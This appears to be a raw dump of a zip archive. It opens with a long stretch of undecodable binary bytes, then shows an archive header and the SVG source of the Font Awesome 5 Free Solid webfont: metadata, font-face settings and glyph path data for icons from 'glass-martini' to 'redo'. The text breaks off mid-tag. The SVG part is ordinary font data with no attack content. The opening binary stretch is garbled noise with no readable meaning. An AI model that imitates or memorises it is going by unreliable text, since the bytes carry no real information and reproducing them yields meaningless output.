��Yk�F�I�1�s���Љ֬D	�]w���N��&�w9q�T�	Z�سJ,�Q�=�Y3����i�4�[����a�i	`���� �E�V7B�� ��Oxb-��8˗��S���e&�C��Ly^���h�ߩ]_t-�)�6�~C�7]�F�>:����|ډ�JW��@{,�r<+����L1�r��2ع��5�1�#Ji$D�`�I�V	}
p$�n�e���[��û����t��rq*S)��>r��Ȋf~�긂��<�W��8=���sį����ά.���J�ƒh��Ә3���f��x'8x�R��^��P�n�]�nh�m��ݵ���*���*�K,wq�l�fj��IaLR����{�$y=��{4I�#�tF��1�����ծ�{���KaʢO�w����k�@��v�o�{�#m����X��d����v$�h�V�@��^�y|g��YR�����P<#�_���_��Tx�7�M��6fe(�$���㚘OPe(��^�ѭ��g�����_s���c���?���3-n�x�����'��;����+�lUܫ�\>�ͪ���J}VR,Qή��!���TJ�(��X��Ng劀R�m��8�a��93	��@���V����o��$�UM?[�)�>���
ί	�fڝ�Tq҈�rv�8��O�H>�0�ؖ&�,!���{>�J�r�4���%y�� ��i(�JkFIC\؊���d�22�^y.��{�����px]34IR~��\���r��{l���gd-]���dlU���Z��R��D�ÌمvR�VF�W\N���s��b�H��C�Î��OQS��L�uXy�@��>�E�G�c���
����H��3�Rs^����4tRq�_^o�X'#���M�m~xk����LD^��p������۟��O{��~${�r�X�;R5r����>ko�:}\���M���-�s(F�N;P�|\�!����S��rz/OT�b	��>EcXm��kTu��'bR<f�e�F�x���#Ѻxq���7k�r|>
c���Z���՜�E;9�+�oQ7���d�_cP��5��N>�|�ʛ�~O���4qĘ��u{n��@w��`��5�x�B^�{T�̉�>~���*���A��>`{����I�P���r�xiۭ�Q
g@��7`�=�`.�@���2,tk ��j,�Z��pst;y�=�,.�u�� �}��#-c� K`�H�=��6���@��2�wf �f��x3,ߍ�n�G0�c�b�@���Bľ+��kbi�c�R���P�-�0c��k�R�?�\|�x�ƴ��k�Ψb	��Q�Lc%zQ��x�
$��ؓ��Q�H�IlJ`"}5ef/�#��y�d�l�N��2gA*ڈ����9fC��,)A$�d����ql|�I�Y�tz�)�*`�~�Ȍ��_��϶��B}|kA{��JJ��*��`T	(oe�D�(`�� 5F�l�Ҙ��X$���Z)�	S9�``�1*�1���@X���t���y�)R�v`>�h�:Ţ+
��V#6K�ΡY�ֵ���--.w|@�B|Hݍ`A�(~��$
�1�pba��@FP?��nO�ͬ8^ �%R�\�T�5Z��`4�-V���t�=^�!A�z!H�fX�DIVTM7L�v\��(N�,/�J�/t�v�0N�n�q^��~?B0�b8AR4�r� J��j�aZ��z~Fq�fyQVu�v�`8O���b�Zo��=„2.����	�8I��(��im��4/��u?����_=���C(�x��������͋'�#�X<�L�3�\�������������������innimk��������@FP'H�fX�DIVTM7L�v\��(N�,/ʪnڮ�i^�m?��~��@FP'H�fX�DIVTM7L�v��C��>@�##�,����Q��c�u1�{Z!��
݉�6G��/��R0j9���eJg&2������L��:��o��__�L�#�36�ˤg
�<��YΧOH[�7�������=�Fi��}>҆���3��Ü��:��
�1g��f�_����8f9���0
K��8U���=D�#�6b��]�δ/x߼�d����q��U�,�"�\�`	�� �L�03�K��?}<�p�����=J$�5��塌9*UԨ������dG�.��@hN�DC�,O��ndjk����DovP]Ω�/����E�X���_�s��h��WRlr��M��*҆~�c'd�թ{��5{�N*ӵ�'9��R��P�����w1�M�5��	3Yj'(�v<66��pW��_��̔���\�|X�����e��l�(̘<���>��t��g�c��F���u�vݽ���G�&罖�����ԥ�]�S�
j�6C��)ӱߟW�}&}�:q��eMڋ"'P��G�L�٬��y��Y0��X��3*��9����J�Y�Pu� �����V��i�_a\9�BUV3q:A(嫆x��J!V��̊/9[QT�i.�������(� �?U��~�U�?��G�C�8qY؉z��+HO(��PZ���	+a�%��,��tw[>��$�c=��g˵�Js�~�]��ɖb�����bF��l�[��&��4����6CFy�2��>���iI����7W�KV���)��Gь�>�ì�#Y��g���ʉBc���{��3b�x'1�^�I���<!�G໡iW�=ϝ��^�S)	�'_����}h1}k�Џ��jӈ��	�h.��xׇ��{�7�Ay"��8����yS:�ƢW�����]�Y�Ś���k�ѕ�+g�k�M�x�pl���w�=	q��k\~.3��Յ&˂:{��P����q�Ď�$O�2r��|�c�6P��
Q���즽��c\�_dk�^�Ӑ���,]"۪�#�B%JB஖"ʂNa��$i=fe�
��^�O��Főͣ�"�H�rͤ�Y^F�<����yAI:r/So3}�
�M�.�ly(�†�P\�"�!��=˝<_?)�������)�����R�2��u��+����wЮ�٪x�y0�t|�q�cwo��^���|���5
7])�ts��A�q-ǻk ���4fl���cAv�:e���W�����sR1y���:�8�BF�n���{T7$c��6t�
��߱\�I��V��(�s�pE�AIɒT��¬��E�U�>,f��D�)Us�'0�s����n����S����Z��7)o�e�J��V��2���}\��hZ�⻓�)���͕�Qr�F�`k犰A}�%�e��g).J���� xG&y�R�Uk�gE��t��
���|Z���vuuk8Ԛ��v0�6 ��Q1S����SfD��Nݓ}�X4��-��r����Q�Lg����D��p�c����1��8Kt!��
�x���߱\��N��a��߭�h�<6�KK}F���4r���4uԶ�
>�p���/��Χʿ��E%$�,�=��把�n��5ܑ]�)Ks)��gȍ�,���\��El	*#�;6� 4��
�Ky�U�p����~�#�wU�ȳ/I�o�DDq?�Ý�W���w�^��(f��<GW�����P������0�\*�/U����cLe��I�������i�*I����S������z���E�\����(ߥe���
�wY�g_?�BƘ1����#��M[����*�3�2tPI+��@�0x��ތ޽W�_�8��*$�X�v��C8��v�l����e)�ԙnY��$����谛Y1���~>Ȫ�x��I���c~D#,NP�I�'��q1�%�o�޿�v�\hY=���J�W�&��C?@�Ey�C���4+��G���_��-��8¼��`�����ء�
�"���Q�U䄷TK���B��T�Cϒ٭��d$�\��w�������Q^����Qփ&tEl|���Ԛ��@PK!��0�s�s%fontawesome/webfonts/fa-solid-900.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<metadata>
Created by FontForge 20190112 at Tue Feb 12 10:24:59 2019
 By Robert Madole
Copyright (c) Font Awesome
</metadata>
<defs>
<font id="FontAwesome5Free-Solid" horiz-adv-x="512" >
  <font-face 
    font-family="Font Awesome 5 Free Solid"
    font-weight="900"
    font-stretch="normal"
    units-per-em="512"
    panose-1="2 0 5 3 0 0 0 0 0 0"
    ascent="448"
    descent="-64"
    bbox="-0.983398 -64.9834 640.104 448.427"
    underline-thickness="25"
    underline-position="-51"
    unicode-range="U+0020-F82F"
  />
    <missing-glyph />
    <glyph glyph-name="glass-martini" unicode="&#xf000;" 
d="M502.05 390.4l-214.05 -214.04v-192.36h56c22.0898 0 40 -17.9102 40 -40c0 -4.41992 -3.58008 -8 -8 -8h-240c-4.41992 0 -8 3.58008 -8 8c0 22.0898 17.9102 40 40 40h56v192.36l-214.05 214.04c-21.25 21.2598 -6.2002 57.5996 23.8496 57.5996h444.4
c30.0498 0 45.0996 -36.3398 23.8496 -57.5996z" />
    <glyph glyph-name="music" unicode="&#xf001;" 
d="M511.99 415.99l0.00976562 -351.99c0 -35.3496 -42.9805 -64 -96 -64s-96 28.6504 -96 64s42.9805 64 96 64c11.2803 0 21.9502 -1.54004 32 -3.91992v184.63l-256 -75.0195v-233.69c0 -35.3496 -42.9805 -64 -96 -64s-96 28.6504 -96 64s42.9805 64 96 64
c11.2803 0 21.9502 -1.54004 32 -3.91992v261.42c0 14 9.09961 26.2998 22.4004 30.5l319.989 94.5c20.5 6.5 41.6006 -8.7998 41.6006 -30.5098z" />
    <glyph glyph-name="search" unicode="&#xf002;" horiz-adv-x="511" 
d="M505 5.2998c9.2998 -9.39941 9.2998 -24.5996 -0.0996094 -34l-28.3008 -28.2998c-9.2998 -9.40039 -24.5 -9.40039 -33.8994 0l-99.7002 99.7002c-4.5 4.5 -7 10.5996 -7 17v16.2998c-35.2998 -27.5996 -79.7002 -44 -128 -44c-114.9 0 -208 93.0996 -208 208
s93.0996 208 208 208s208 -93.0996 208 -208c0 -48.2998 -16.4004 -92.7002 -44 -128h16.2998c6.40039 0 12.5 -2.5 17 -7zM208 112c70.7998 0 128 57.2998 128 128c0 70.7998 -57.2998 128 -128 128c-70.7998 0 -128 -57.2998 -128 -128c0 -70.7998 57.2998 -128 128 -128z
" />
    <glyph glyph-name="heart" unicode="&#xf004;" 
d="M462.3 385.4c62.7998 -53.6006 66.1006 -149.801 9.7998 -207.9l-193.5 -199.8c-12.5 -12.9004 -32.7998 -12.9004 -45.2998 0l-193.5 199.8c-56.2002 58.0996 -52.8994 154.3 9.90039 207.9c54.7998 46.6992 136.399 38.2998 186.6 -13.6006l19.7002 -20.2998
l19.7002 20.2998c50.2998 51.9004 131.8 60.2998 186.6 13.6006z" />
    <glyph glyph-name="star" unicode="&#xf005;" horiz-adv-x="576" 
d="M259.3 430.2c11.7998 23.8994 45.7002 23.5996 57.4004 0l65.2998 -132.4l146.1 -21.2998c26.2002 -3.7998 36.7002 -36.0996 17.7002 -54.5996l-105.7 -103l25 -145.5c4.5 -26.3008 -23.1992 -45.9004 -46.3994 -33.7002l-130.7 68.7002l-130.7 -68.7002
c-23.2002 -12.2998 -50.8994 7.39941 -46.3994 33.7002l25 145.5l-105.7 103c-19 18.5 -8.5 50.7998 17.7002 54.5996l146.1 21.2998z" />
    <glyph glyph-name="user" unicode="&#xf007;" horiz-adv-x="448" 
d="M224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM313.6 160c74.2002 0 134.4 -60.2002 134.4 -134.4v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v41.5996
c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992z" />
    <glyph glyph-name="film" unicode="&#xf008;" 
d="M488 384c13.2998 0 24 -10.7002 24 -24v-336c0 -13.2998 -10.7002 -24 -24 -24h-8v20c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-20h-320v20c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-20h-8
c-13.2998 0 -24 10.7002 -24 24v336c0 13.2998 10.7002 24 24 24h8v-20c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v20h320v-20c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v20h8zM96 76v40c0 6.59961 -5.40039 12 -12 12h-40
c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM96 172v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM96 268v40
c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM368 60v96c0 6.59961 -5.40039 12 -12 12h-200c-6.59961 0 -12 -5.40039 -12 -12v-96c0 -6.59961 5.40039 -12 12 -12h200
c6.59961 0 12 5.40039 12 12zM368 228v96c0 6.59961 -5.40039 12 -12 12h-200c-6.59961 0 -12 -5.40039 -12 -12v-96c0 -6.59961 5.40039 -12 12 -12h200c6.59961 0 12 5.40039 12 12zM480 76v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40
c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM480 172v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM480 268v40c0 6.59961 -5.40039 12 -12 12h-40
c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="th-large" unicode="&#xf009;" 
d="M296 416h192c13.2549 0 24 -10.7451 24 -24v-160c0 -13.2549 -10.7451 -24 -24 -24h-192c-13.2549 0 -24 10.7451 -24 24v160c0 13.2549 10.7451 24 24 24zM216 416c13.2549 0 24 -10.7451 24 -24v-160c0 -13.2549 -10.7451 -24 -24 -24h-192
c-13.2549 0 -24 10.7451 -24 24v160c0 13.2549 10.7451 24 24 24h192zM0 152c0 13.2549 10.7451 24 24 24h192c13.2549 0 24 -10.7451 24 -24v-160c0 -13.2549 -10.7451 -24 -24 -24h-192c-13.2549 0 -24 10.7451 -24 24v160zM296 -32c-13.2549 0 -24 10.7451 -24 24v160
c0 13.2549 10.7451 24 24 24h192c13.2549 0 24 -10.7451 24 -24v-160c0 -13.2549 -10.7451 -24 -24 -24h-192z" />
    <glyph glyph-name="th" unicode="&#xf00a;" 
d="M149.333 392v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24zM330.667 152c0 -13.2549 -10.7451 -24 -24.001 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80
c0 13.2549 10.7451 24 24 24h101.334c13.2549 0 24 -10.7451 24 -24v-80zM362.667 392c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80zM330.667 312
c0 -13.2549 -10.7451 -24 -24.001 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.334c13.2549 0 24 -10.7451 24 -24v-80zM125.333 256c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333
c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333zM0 72c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80zM386.667 128
c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333zM386.667 -32c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24
v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333zM181.333 72c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80z" />
    <glyph glyph-name="th-list" unicode="&#xf00b;" 
d="M149.333 232v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24zM0 72c0 13.2549 10.7451 24 24 24h101.333c13.2549 0 24 -10.7451 24 -24v-80
c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80zM125.333 416c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-101.333c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h101.333zM205.333 -32
c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h282.667c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-282.667zM181.333 392c0 13.2549 10.7451 24 24 24h282.667c13.2549 0 24 -10.7451 24 -24v-80
c0 -13.2549 -10.7451 -24 -24 -24h-282.667c-13.2549 0 -24 10.7451 -24 24v80zM205.333 128c-13.2549 0 -24 10.7451 -24 24v80c0 13.2549 10.7451 24 24 24h282.667c13.2549 0 24 -10.7451 24 -24v-80c0 -13.2549 -10.7451 -24 -24 -24h-282.667z" />
    <glyph glyph-name="check" unicode="&#xf00c;" 
d="M173.898 8.5957l-166.4 166.4c-9.99707 9.99707 -9.99707 26.2061 0 36.2041l36.2031 36.2041c9.99707 9.99805 26.207 9.99805 36.2041 0l112.095 -112.095l240.095 240.095c9.99707 9.99707 26.207 9.99707 36.2041 0l36.2031 -36.2041
c9.99707 -9.99707 9.99707 -26.2061 0 -36.2041l-294.4 -294.401c-9.99805 -9.99707 -26.207 -9.99707 -36.2031 0.000976562z" />
    <glyph glyph-name="times" unicode="&#xf00d;" horiz-adv-x="352" 
d="M242.72 192l100.07 -100.07c12.2803 -12.29 12.2803 -32.1992 0 -44.4795l-22.2402 -22.2402c-12.2803 -12.2803 -32.2002 -12.2803 -44.4795 0l-100.07 100.07l-100.07 -100.07c-12.2793 -12.2803 -32.1992 -12.2803 -44.4795 0l-22.2402 22.2402
c-12.2803 12.29 -12.2803 32.2002 0 44.4795l100.07 100.07l-100.07 100.07c-12.2803 12.29 -12.2803 32.1992 0 44.4795l22.2402 22.2402c12.29 12.2803 32.2002 12.2803 44.4795 0l100.07 -100.07l100.07 100.07c12.29 12.2803 32.1992 12.2803 44.4795 0
l22.2402 -22.2402c12.2803 -12.29 12.2803 -32.2002 0 -44.4795z" />
    <glyph glyph-name="search-plus" unicode="&#xf00e;" horiz-adv-x="511" 
d="M304 256v-32c0 -6.59961 -5.40039 -12 -12 -12h-56v-56c0 -6.59961 -5.40039 -12 -12 -12h-32c-6.59961 0 -12 5.40039 -12 12v56h-56c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h56v56c0 6.59961 5.40039 12 12 12h32c6.59961 0 12 -5.40039 12 -12
v-56h56c6.59961 0 12 -5.40039 12 -12zM505 -28.7002l-28.2998 -28.2998c-9.40039 -9.40039 -24.6006 -9.40039 -33.9004 0l-99.7998 99.7002c-4.5 4.5 -7 10.5996 -7 17v16.2998c-35.2998 -27.5996 -79.7002 -44 -128 -44c-114.9 0 -208 93.0996 -208 208
s93.0996 208 208 208s208 -93.0996 208 -208c0 -48.2998 -16.4004 -92.7002 -44 -128h16.2998c6.40039 0 12.5 -2.5 17 -7l99.7002 -99.7002c9.2998 -9.39941 9.2998 -24.5996 0 -34zM344 240c0 75.2002 -60.7998 136 -136 136s-136 -60.7998 -136 -136
s60.7998 -136 136 -136s136 60.7998 136 136z" />
    <glyph glyph-name="search-minus" unicode="&#xf010;" horiz-adv-x="511" 
d="M304 256v-32c0 -6.59961 -5.40039 -12 -12 -12h-168c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h168c6.59961 0 12 -5.40039 12 -12zM505 -28.7002l-28.2998 -28.2998c-9.40039 -9.40039 -24.6006 -9.40039 -33.9004 0l-99.7998 99.7002
c-4.5 4.5 -7 10.5996 -7 17v16.2998c-35.2998 -27.5996 -79.7002 -44 -128 -44c-114.9 0 -208 93.0996 -208 208s93.0996 208 208 208s208 -93.0996 208 -208c0 -48.2998 -16.4004 -92.7002 -44 -128h16.2998c6.40039 0 12.5 -2.5 17 -7l99.7002 -99.7002
c9.2998 -9.39941 9.2998 -24.5996 0 -34zM344 240c0 75.2002 -60.7998 136 -136 136s-136 -60.7998 -136 -136s60.7998 -136 136 -136s136 60.7998 136 136z" />
    <glyph glyph-name="power-off" unicode="&#xf011;" horiz-adv-x="511" 
d="M400 393.9c63 -45 104 -118.601 104 -201.9c0 -136.8 -110.8 -247.7 -247.5 -248c-136.5 -0.299805 -248.3 111 -248.5 247.6c-0.0996094 83.3008 40.9004 157.101 103.8 202.2c11.7002 8.2998 28 4.7998 35 -7.7002l15.7998 -28.0996
c5.90039 -10.5 3.10059 -23.7998 -6.59961 -31c-41.5 -30.7998 -68 -79.5996 -68 -134.9c-0.0996094 -92.2998 74.5 -168.1 168 -168.1c91.5996 0 168.6 74.2002 168 169.1c-0.299805 51.8008 -24.7002 101.801 -68.0996 134c-9.7002 7.2002 -12.4004 20.5 -6.5 30.9004
l15.7998 28.0996c7 12.4004 23.2002 16.1006 34.7998 7.80078zM296 184c0 -13.2998 -10.7002 -24 -24 -24h-32c-13.2998 0 -24 10.7002 -24 24v240c0 13.2998 10.7002 24 24 24h32c13.2998 0 24 -10.7002 24 -24v-240z" />
    <glyph glyph-name="signal" unicode="&#xf012;" horiz-adv-x="640" 
d="M216 160c8.83984 0 16 -7.16016 16 -16v-192c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16v192c0 8.83984 7.16016 16 16 16h48zM88 64c8.83984 0 16 -7.16016 16 -16v-96c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16v96
c0 8.83984 7.16016 16 16 16h48zM344 256c8.83984 0 16 -7.16016 16 -16v-288c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16v288c0 8.83984 7.16016 16 16 16h48zM472 352c8.83984 0 16 -7.16016 16 -16v-384c0 -8.83984 -7.16016 -16 -16 -16h-48
c-8.83984 0 -16 7.16016 -16 16v384c0 8.83984 7.16016 16 16 16h48zM600 448c8.83984 0 16 -7.16016 16 -16v-480c0 -8.83984 -7.16016 -16 -16 -16h-48c-8.83984 0 -16 7.16016 -16 16v480c0 8.83984 7.16016 16 16 16h48z" />
    <glyph glyph-name="cog" unicode="&#xf013;" 
d="M487.4 132.3c4.89941 -2.7998 7.09961 -8.59961 5.59961 -14.0996c-11.0996 -35.7002 -30 -67.9004 -54.7002 -94.6006c-3.7998 -4.19922 -9.89941 -5.09961 -14.7998 -2.2998l-42.5996 24.6006c-18 -15.3008 -38.6006 -27.2002 -60.8008 -35.1006v-49.2002
c0 -5.59961 -3.89941 -10.5 -9.39941 -11.6992c-34.9004 -7.80078 -72.5 -8.2002 -109.2 0c-5.5 1.19922 -9.40039 6.09961 -9.40039 11.6992v49.2002c-22.2998 7.7998 -42.8994 19.7002 -60.7998 35.1006l-42.5996 -24.6006c-4.7998 -2.7998 -11 -1.7998 -14.7998 2.2998
c-24.7002 26.8008 -43.6006 59 -54.7002 94.6006c-1.60059 5.39941 0.599609 11.2002 5.5 14l42.5996 24.5996c-4.2998 23.2002 -4.2998 47 0 70.2002l-42.5996 24.5996c-4.90039 2.80078 -7.2002 8.60059 -5.5 14c11.0996 35.7002 30 67.9004 54.7002 94.6006
c3.7998 4.2002 9.89941 5.09961 14.7998 2.2998l42.5 -24.5996c18 15.2998 38.5996 27.1992 60.7998 35.0996v49.2002c0 5.59961 3.90039 10.5 9.40039 11.7002c34.8994 7.7998 72.5 8.19922 109.199 0c5.5 -1.2002 9.40039 -6.10059 9.40039 -11.7002v-49.1006
c22.2998 -7.7998 42.9004 -19.6992 60.7998 -35.0996l42.6006 24.5996c4.7998 2.80078 11 1.80078 14.7998 -2.2998c24.7002 -26.7998 43.5996 -59 54.7002 -94.5996c1.59961 -5.40039 -0.600586 -11.2002 -5.5 -14l-42.6006 -24.6006
c4.2998 -23.1992 4.2998 -47 0 -70.1992zM256 112c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="home" unicode="&#xf015;" horiz-adv-x="576" 
d="M280.37 299.74c1.84863 1.49023 5.27539 2.69922 7.64941 2.69922c2.375 0 5.80176 -1.20898 7.65039 -2.69922l184.33 -151.74v-164c0 -8.83203 -7.16797 -16 -16 -16l-112.02 0.30957h-0.000976562c-8.83203 0 -16 7.16797 -16 16
c0 0.0146484 0 0.0371094 0.000976562 0.0507812v95.6396c0 8.83203 -7.16895 16 -16 16h-64c-8.83203 0 -16 -7.16797 -16 -16v-95.71v0c0 -8.78809 -7.13281 -15.9561 -15.9209 -16l-112.06 -0.290039c-8.83203 0 -16 7.16797 -16 16v163.89zM571.6 196.53
c2.44531 -1.98828 4.42969 -6.15918 4.42969 -9.31055c0 -2.37305 -1.22266 -5.78613 -2.72949 -7.62012l-25.5 -31c-1.98633 -2.40332 -6.13086 -4.35449 -9.24902 -4.35449c-2.38574 0 -5.81348 1.23438 -7.65039 2.75488l-235.23 193.74
c-1.84863 1.49023 -5.27539 2.69922 -7.65039 2.69922c-2.37402 0 -5.80078 -1.20898 -7.64941 -2.69922l-235.22 -193.74c-1.83691 -1.5166 -5.26074 -2.74805 -7.64258 -2.74805c-3.12793 0 -7.28027 1.96191 -9.26758 4.37793l-25.5 31
c-1.52051 1.83789 -2.75488 5.26562 -2.75488 7.65039c0 3.11914 1.95117 7.2627 4.35449 9.25l253.13 208.47c7.33594 6.03613 21 10.9355 30.5 10.9355c9.50098 0 23.1641 -4.89941 30.5 -10.9355l89.5303 -73.6602v72.6104c0 6.62402 5.37598 12 12 12h56
c6.62402 0 12 -5.37598 12 -12v-138.51z" />
    <glyph glyph-name="clock" unicode="&#xf017;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM313.1 89.9004c5.40039 -3.90039 12.9004 -2.7002 16.8008 2.59961l28.1992 38.7998c3.90039 5.40039 2.80078 12.9004 -2.59961 16.7998l-63.5 46.2002v137.7
c0 6.59961 -5.40039 12 -12 12h-48c-6.59961 0 -12 -5.40039 -12 -12v-168.3c0 -3.7998 1.7998 -7.40039 4.90039 -9.7002z" />
    <glyph glyph-name="road" unicode="&#xf018;" horiz-adv-x="576" 
d="M573.19 45.3301c9.25977 -21.1904 -5.5 -45.3301 -27.7305 -45.3301h-196.84l-10.3105 97.6797c-0.859375 8.14062 -7.71973 14.3203 -15.9092 14.3203h-68.8008c-8.18945 0 -15.0498 -6.17969 -15.9092 -14.3203l-10.3105 -97.6797h-196.84
c-22.2305 0 -36.9902 24.1396 -27.7402 45.3301l139.79 320c4.96973 11.3799 15.7998 18.6699 27.7305 18.6699h97.5898l-2.4502 -23.1602c-0.5 -4.71973 3.20996 -8.83984 7.95996 -8.83984h29.1602c4.75 0 8.45996 4.12012 7.95996 8.83984l-2.4502 23.1602h97.5898
c11.9199 0 22.75 -7.29004 27.7207 -18.6699zM260.4 312.84l-4.59082 -43.5801c-0.75 -7.08984 4.80078 -13.2598 11.9307 -13.2598h40.54c7.12012 0 12.6797 6.16992 11.9297 13.2598l-4.59961 43.5801c-0.430664 4.07031 -3.87012 7.16016 -7.95996 7.16016h-39.29
h-0.00488281c-3.97363 0 -7.53809 -3.20801 -7.95508 -7.16016zM315.64 144c9.5 0 16.9102 8.23047 15.9102 17.6797l-5.06934 48c-0.860352 8.14062 -7.7207 14.3203 -15.9102 14.3203h-45.1504c-8.18945 0 -15.0498 -6.17969 -15.9102 -14.3203l-5.06934 -48
c-1 -9.44922 6.40918 -17.6797 15.9092 -17.6797h55.29z" />
    <glyph glyph-name="download" unicode="&#xf019;" 
d="M216 448h80c13.2998 0 24 -10.7002 24 -24v-168h87.7002c17.7998 0 26.7002 -21.5 14.0996 -34.0996l-152.1 -152.2c-7.5 -7.5 -19.7998 -7.5 -27.2998 0l-152.301 152.2c-12.5996 12.5996 -3.69922 34.0996 14.1006 34.0996h87.7998v168c0 13.2998 10.7002 24 24 24z
M512 72v-112c0 -13.2998 -10.7002 -24 -24 -24h-464c-13.2998 0 -24 10.7002 -24 24v112c0 13.2998 10.7002 24 24 24h146.7l49 -49c20.0996 -20.0996 52.5 -20.0996 72.5996 0l49 49h146.7c13.2998 0 24 -10.7002 24 -24zM388 -16c0 11 -9 20 -20 20s-20 -9 -20 -20
s9 -20 20 -20s20 9 20 20zM452 -16c0 11 -9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20s20 9 20 20z" />
    <glyph glyph-name="inbox" unicode="&#xf01c;" horiz-adv-x="576" 
d="M567.938 204.092c4.4502 -6.6748 8.06152 -18.6025 8.06152 -26.624v-0.000976562v-129.467c0 -26.5098 -21.4902 -48 -48 -48h-480c-26.5098 0 -48 21.4902 -48 48v129.467v0.000976562c0 8.02148 3.61133 19.9492 8.06152 26.624l105.689 158.534
c7.86621 11.7988 25.7578 21.374 39.9385 21.374h268.621c14.1807 0 32.0732 -9.57617 39.9395 -21.374zM162.252 320l-85.334 -128h123.082l32 -64h112l32 64h123.082l-85.333 128h-251.497z" />
    <glyph glyph-name="redo" unicode="&#xf01e;" horiz-adv-x="520" 
d="M500.333 448c6.62695 0 12 -5.37305 12 -12v-200.332c0 -6.62695 -5.37305 -12 -12 -12h-200.333c-6.62695 0 -12 5.37305 -12 12v47.4111c0 6.85254 5.72852 12.3135 12.5742 11.9863l101.524 -4.86523c-31.5928 46.9414 -85.207 77.7998 -146.099 77.7998
c-97.2842 0 -176 -78.7334 -176 -176c0 -97.2842 78.7334 -176 176 -176c44.6064 0 85.3076 16.5518 116.309 43.8555c4.74023 4.17383 11.9141 3.92285 16.3809 -0.543945l33.9707 -33.9707c4.87207 -4.87207 4.63086 -12.8145 -0.482422 -17.4326
c-43.9756 -39.7217 -102.252 -63.9082 -166.178 -63.9082c-136.904 0 -247.899 110.932 -248 247.813c-0.100586 136.66 111.34 248.187 248.001 248.187c75.6709 0 143.415 -33.8994 188.901 -87.333l-3.9668 82.7588c-0.327148 6.8457 5.13379 12.5742 11.9863 12.5742
h47.4111z" />
    <glyph glyph-name="sync" unicode="&#xf021;" 
